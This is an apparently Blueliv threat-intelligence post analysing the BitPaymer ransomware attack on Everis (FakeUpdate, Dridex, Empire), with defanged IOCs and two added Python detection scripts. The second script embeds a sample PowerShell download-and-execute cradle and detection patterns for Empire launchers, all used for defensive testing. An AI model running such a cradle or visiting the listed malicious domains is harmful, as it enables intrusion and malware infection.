Spanish consultancy Everis suffers BitPaymer ransomware attack: a brief analysis

Key Points 

  • Everis was infected with BitPaymer (FriedEx/IEncrypt), a targeted ransomware operated by the Dridex Group. Domestic users are not affected by this threat, just businesses 
  • This security incident is unrelated to the attack suffered by Cadena SER (PRISA) 
  • There are no confirmations that any other Spanish companies were targeted in the same attack 
  • According to IOCs, the entry point was a FakeUpdate (SocGholish) installing Dridex (botnet 199) in Everis systems 
  • From the Dridex infection, the attackers moved laterally using PowerShell Empire and finally executed BitPaymer in specific machines

Ransomware Attack Overview 

Due to the lack of official information from Everis, different researchers and media outlets started to share hypotheses about this ransomware attack. The ransom note, containing a custom message to Everis, was leaked to the media, and some infected files with the extension “.3v3r1s” were uploaded to Virus Total.

As a result, it was possible to better understand the kind of threat Everis faced. The ransom note had exactly the same format as the note BitPaymer normally drops in its infections, and a custom extension is also typical of BitPaymer infections. In this case, the sample related to Everis was bd327754f879ff15b48fc86c741c4f546b9bbae5c1a5ac4c095df05df696ec4f.


One day after the initial incident (5th November 2019), a comment was published on Virus Total by a newly created user, sharing IOCs and information related to the Everis incident. This information mentioned a compromised website that was dropping a JavaScript file, which in turn installed Emotet on the victims’ computers. Following this, the attackers apparently used Empire to move laterally and execute BitPaymer.


The usual modus operandi of the attackers behind BitPaymer is to use Dridex as an entry point and later move laterally in the targeted network. Dridex can be installed on systems via Emotet spam or other methods, but seeing Emotet itself as the entry point for lateral movement was something we had not observed previously.

We used our sandbox to execute the IOCs shared as Emotet in the Virus Total comment (1d778359ab155cb190b9f2a7086c3bcb4082aa195ff8f754dae2d665fd20aa05 and 628c181e6b9797d8356e43066ae182a45e6c37dbee28d9093df8f0825c342d4c). It turned out that those samples were actually Dridex, belonging to botnet 199. As this is what we would expect from the group operating BitPaymer, we assume there was an error in the malware classification but that the IOCs shared might indeed be related to the Everis incident.

Attack Vector 

Several hypotheses have been proposed regarding the attack vector. As there was a peak of BlueKeep exploitation during the past weekend, some sources pointed to BlueKeep as the source of the attack.

Alternative hypotheses pointed to malware spam distribution, possibly using Emotet. The Virus Total comment that apparently leaked Everis information mentioned a compromised website (esancendoc[.]esan[.]edu[.]pe) and a download link on the subdomain click[.]clickanalytics208[.]com.

Knowing that Dridex was used in the attack, Blueliv analysts are more inclined towards the spam theory than BlueKeep, as exploitation of that kind is not the normal behavior of the group operating BitPaymer. However, the domain mentioned on Virus Total, click[.]clickanalytics208[.]com, has a long history of malicious activity related to FakeUpdate campaigns that dropped different malware families in the past, including Chthonic, AZORult, NetSupport RAT and… Dridex!

The filenames mentioned in the Virus Total comment (Chrome.Update.3f61f4.js and crhome.update.3f61f4.exe) also point in the direction of a FakeUpdate downloaded from the web browser and executed by the user. The group operating this malware distribution network is known as SocGholish and has been active for several years.

It is not confirmed whether the victim reached the SocGholish domain via a watering hole (esancendoc[.]esan[.]edu[.]pe), as described in the Virus Total comment, or via other means such as spam distribution. As the different IOCs mentioned in this comment have been quite accurate, the watering hole option is quite plausible and could indeed be the infection vector for the Everis incident.
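As an added example (not code from this post or from Blueliv), the following Python script checks proxy and EDR events against the indicators quoted above: the watering-hole and SocGholish domains, the three SHA-256 hashes cited in this post, and a filename pattern generalised from Chrome.Update.3f61f4.js / crhome.update.3f61f4.exe. The two log formats and the sample log lines are constructed for the example, and the filename regex is an assumption about how such FakeUpdate names are shaped, not something the post states.

```python
import re
from urllib.parse import urlparse

# Indicators quoted in the post, kept defanged exactly as published.
WATERING_HOLE = "esancendoc[.]esan[.]edu[.]pe"
SOCGHOLISH_HOST = "click[.]clickanalytics208[.]com"
KNOWN_HASHES = {
    "bd327754f879ff15b48fc86c741c4f546b9bbae5c1a5ac4c095df05df696ec4f": "BitPaymer (.3v3r1s sample)",
    "1d778359ab155cb190b9f2a7086c3bcb4082aa195ff8f754dae2d665fd20aa05": "Dridex botnet 199",
    "628c181e6b9797d8356e43066ae182a45e6c37dbee28d9093df8f0825c342d4c": "Dridex botnet 199",
}
# Generalises the two file names on the page (Chrome.Update.3f61f4.js and
# crhome.update.3f61f4.exe): a short browser-like word, "update", a hex tag,
# and a .js or .exe extension. The exact shape is an assumption.
FAKEUPDATE_NAME = re.compile(r"^[a-z]{4,10}[._-]update[._-][0-9a-f]{4,8}\.(?:js|exe)$", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable hostname."""
    return ioc.replace("[.]", ".").lower()


IOC_DOMAINS = {
    refang(WATERING_HOLE): "watering hole",
    refang(SOCGHOLISH_HOST): "SocGholish FakeUpdate host",
}


def domain_matches(host: str, ioc: str) -> bool:
    """Exact match or subdomain of the indicator, never a plain substring match."""
    return host == ioc or host.endswith("." + ioc)


def scan_proxy_line(line: str):
    """Constructed proxy format: '<ts> <workstation> <method> <url> <status>'.
    Returns an alert dict, or None when nothing matched."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, workstation, _method, url, _status = parts
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    filename = parsed.path.rsplit("/", 1)[-1]
    reasons = [label for ioc, label in IOC_DOMAINS.items() if domain_matches(host, ioc)]
    if FAKEUPDATE_NAME.match(filename):
        reasons.append("FakeUpdate-style filename " + filename)
    return {"ts": ts, "host": workstation, "reasons": reasons} if reasons else None


def scan_proxy_log(text: str) -> list:
    return [a for a in (scan_proxy_line(line) for line in text.splitlines()) if a]


def scan_file_events(text: str) -> list:
    """Constructed EDR format: '<ts> <workstation> <filename> <sha256>'."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, workstation, name, sha256 = parts
        reasons = []
        if sha256.lower() in KNOWN_HASHES:
            reasons.append(KNOWN_HASHES[sha256.lower()])
        if FAKEUPDATE_NAME.match(name):
            reasons.append("FakeUpdate-style filename " + name)
        if reasons:
            hits.append({"ts": ts, "host": workstation, "reasons": reasons})
    return hits


# Constructed sample data; workstation ws-0142 replays the chain from the post.
PROXY_LOG = """\
2019-11-04T09:12:01Z ws-0142 GET http://esancendoc.esan.edu.pe/index.php 200
2019-11-04T09:12:03Z ws-0142 GET https://click.clickanalytics208.com/Chrome.Update.3f61f4.js 200
2019-11-04T09:13:10Z ws-0142 GET https://www.example.com/news 200
"""
FILE_EVENTS = """\
2019-11-04T09:12:40Z ws-0142 crhome.update.3f61f4.exe 1d778359ab155cb190b9f2a7086c3bcb4082aa195ff8f754dae2d665fd20aa05
2019-11-04T09:30:00Z ws-0077 setup.exe 0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for alert in scan_proxy_log(PROXY_LOG) + scan_file_events(FILE_EVENTS):
        print(alert["ts"], alert["host"], "; ".join(alert["reasons"]))
```

The domain check deliberately matches only the indicator itself or its subdomains, so a lookalike such as a host that merely contains the string would not fire; the filename regex is the weakest signal here and is best treated as a hunting lead rather than a blocking rule.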

Bitpaymer Ransomware Attribution 

The group behind BitPaymer, known as the Dridex Group or INDRIK SPIDER, also operates Dridex. This is the reason one of the main infection vectors for BitPaymer is to use existing Dridex infections to infiltrate the targeted organization's network. Usually, the distribution of Dridex is not highly targeted, but given that it is a large botnet made up of various sub-botnets, the affiliates behind them may choose numerous ways to spread the malware.

The cybercriminals operating the main botnet check the infected machines in the control panel, searching for large or strategically important organizations in order to execute more advanced attacks against them. 

They usually execute a stager that connects back to their PowerShell Empire server, from which they can control operations more effectively. In the past, the group dropped specific malicious code such as POS malware or Anunak/Carbanak. Currently, they are using BitPaymer to try to make the most of their intrusions.
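The lateral-movement step described above, an Empire stager launched on a machine already infected with Dridex, leaves a trail in process-creation events. The following Python script is an added example (not the post's or Blueliv's code) that scores PowerShell command lines from such events: it decodes -EncodedCommand payloads, checks for the flag combination commonly associated with Empire launchers, looks for a download-and-execute cradle in the decoded script, and flags parent processes that indicate remote execution. The flag set, the parent list, the event format and the sample events are all assumptions constructed for the example; the sample cradle points at a reserved .invalid name.

```python
import base64
import re

# Command-line traits modelled on the PowerShell Empire default launcher as it
# is commonly documented (no profile, STA, hidden window, encoded command).
# The exact flag set is an assumption, not taken from the post.
FLAG_CHECKS = [
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile disabled"),
    (re.compile(r"-(?:noni|noninteractive)\b", re.I), "non-interactive"),
    (re.compile(r"-(?:w|windowstyle)\s+(?:1|hidden)\b", re.I), "hidden window"),
    (re.compile(r"-sta\b", re.I), "single-threaded apartment"),
]
# Traits of the decoded script body typical of a download-and-execute cradle.
CONTENT_CHECKS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"net\.webclient", re.I), "WebClient object"),
    (re.compile(r"downloadstring|downloaddata", re.I), "remote download"),
]
# Parents that usually mean the process was started remotely (WMI, PsExec-style
# services); constructed list, tune it to your environment.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "psexesvc.exe", "services.exe"}
ALERT_THRESHOLD = 3


def encode_for_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -e/-ec/-enc/-EncodedCommand payload, or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Truncated or non-base64 argument: still worth a look, but not decodable.
        return None


def score_command_line(cmdline: str, parent: str = ""):
    """Score one process-creation event; returns (score, reasons)."""
    if "powershell" not in cmdline.lower():
        return 0, []
    reasons = [label for rx, label in FLAG_CHECKS if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        reasons += [label for rx, label in CONTENT_CHECKS if rx.search(decoded)]
    if parent.lower() in REMOTE_EXEC_PARENTS:
        reasons.append("remote-execution parent " + parent.lower())
    return len(reasons), reasons


def triage(events) -> list:
    """Hosts whose process events reach the alert threshold."""
    return [e["host"] for e in events
            if score_command_line(e["cmdline"], e.get("parent", ""))[0] >= ALERT_THRESHOLD]


# Constructed events. The cradle is a generic download-and-execute one-liner
# pointing at a reserved .invalid name, present only so the decoder and the
# content checks have something to inspect.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/launcher')"
EVENTS = [
    {"host": "ws-0142", "parent": "wmiprvse.exe",
     "cmdline": "powershell -noP -sta -w 1 -enc " + encode_for_powershell(CRADLE)},
    {"host": "ws-0077", "parent": "explorer.exe",
     "cmdline": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"host": "srv-01", "parent": "cmd.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
]

if __name__ == "__main__":
    for e in EVENTS:
        score, reasons = score_command_line(e["cmdline"], e["parent"])
        print(e["host"], score, "; ".join(reasons))
```

Scoring rather than matching a single flag keeps the routine administrative invocations (a scheduled script, a one-off -NoProfile command) below the threshold while the stager-style launch, which combines several traits and a remote-execution parent, clears it comfortably; the threshold is a starting point to tune against your own baseline of legitimate PowerShell use.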

Recommendations 

Our usual recommendations to protect against malware infections and ransomware attacks apply in this case. As we have mentioned, groups operating targeted ransomware such as BitPaymer or Ryuk usually take advantage of existing infections. It is therefore common to see FakeUpdates and malware spam as initial infection points.

With this in mind, Blueliv makes the following recommendations: 

  • PROTECT AGAINST MALWARE INFECTIONS: use monitoring and threat intelligence tools to detect existing infections in networks and systems. These are particularly effective against well-known families such as Dridex and Trickbot
  • MONITOR FOR EXPOSED RDP SERVERS: continuously check whether RDP servers are exposed, and ensure that the number of machines exposed externally is limited. It is critical that all of them are regularly patched 
  • ENSURE STRONG BACKUP POLICIES: make sure backups are made and that they are stored outside the company network. It should be noted that these groups usually try to destroy backups before infecting a company with ransomware, so ideally backups should be kept outside the company network and indeed outside its physical facilities
  • EDUCATION, EDUCATION, EDUCATION: most of those threats start from a malicious email or a fake application downloaded from the Internet. All users within any organization, from the management to the newest intern, must be educated in basic cybersecurity skills. Under no circumstances should the only people in the company who can spot a potential threat be the IT or security team.

[Table: IOCs related to the Everis incident]

NB: These IOCs have not been confirmed by Everis, but they are likely related to the incident.


This post was authored by Head of Threat Intelligence Jose Miguel Esparza and the Blueliv Labs team

About the Author

Jose Miguel Esparza, Senior Threat Analyst, Outpost24